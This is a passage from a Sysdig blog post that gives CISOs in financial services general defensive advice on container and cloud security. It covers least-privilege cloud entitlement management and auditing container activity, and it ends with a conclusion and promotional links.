Cloud environments have many users and resources that require access and privileges to do their job. Over time, it becomes a struggle to control and manage access rights and permissions granted to cloud identities. Organizations end up with unused identities and excessive permissions that may be targeted as entry points for adversaries. Ensuring you have full visibility into cloud assets and identities to detect and remove excessive permissions is key to enforcing least-privilege access policies to grant just enough permissions to perform necessary actions. Cloud Infrastructure Entitlements Management (CIEM) tools help automatically discover all identity and access management (IAM) roles, permissions, and usage to recommend the right permission settings to safeguard your business.



5. Ensure you have a way to audit activity and investigate security events

With such a short life span, it’s imperative to establish a way to record detailed container activity that is retained after a container has stopped. In the event of anomalous behavior, you want to know what processes were spawned. What connections were made? What files were modified? What HTTP requests were processed? And then you need to be able to correlate this system activity with user activity. What users accessed the container? What did they do? With access to this type of deep container activity, you can effectively triage what happened and quickly respond. If you don’t, you are blind to what is happening.

Conclusion

As organizations increase their use of containers and Kubernetes for critical applications, efforts to exploit these technologies will escalate.

CISOs who rethink their security processes with these five aspects in mind will be better equipped to face security threats across their containers and cloud, in a cohesive manner that empowers innovation.

Interested in container security and compliance? You might enjoy these other resources:

· Dig deeper with our comprehensive Kubernetes security guide.

· Learn why PCI compliance is so challenging for containers.

· And finally, discover how the Sysdig platform can help you. Request a demo today!

The post Five Things CISOs in Financial Services can do to make Containers Secure and Compliant appeared first on Sysdig.

]]>